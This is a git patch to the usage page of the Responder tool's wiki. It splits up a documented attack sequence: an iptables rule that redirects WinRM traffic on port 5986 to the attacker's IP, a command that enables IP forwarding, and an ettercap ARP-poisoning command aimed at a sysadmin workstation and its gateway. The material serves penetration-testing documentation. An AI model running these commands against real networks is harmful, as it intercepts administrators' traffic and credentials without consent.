From 9197ddccaf3058cc6cb8cb74b36f617c61b100e6 Mon Sep 17 00:00:00 2001 From: lgandx Date: Wed, 21 Apr 2021 16:42:32 -0300 Subject: [PATCH] Updated Responder Usage (markdown) --- Responder-Usage.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/Responder-Usage.md b/Responder-Usage.md index a497e3f..53edecd 100644 --- a/Responder-Usage.md +++ b/Responder-Usage.md @@ -88,5 +88,8 @@ Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our //Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986 > iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986 -//Enable IP Forward to avoid disruption and launch a targeted ARP attack against 192.168.0.153 ->echo 1 > /proc/sys/net/ipv4/ip_forward&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file +//Enable IP Forward to avoid disruption +>echo 1 > /proc/sys/net/ipv4/ip_forward + +//Launch the targeted ARP poisoning against 192.168.0.153 +&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file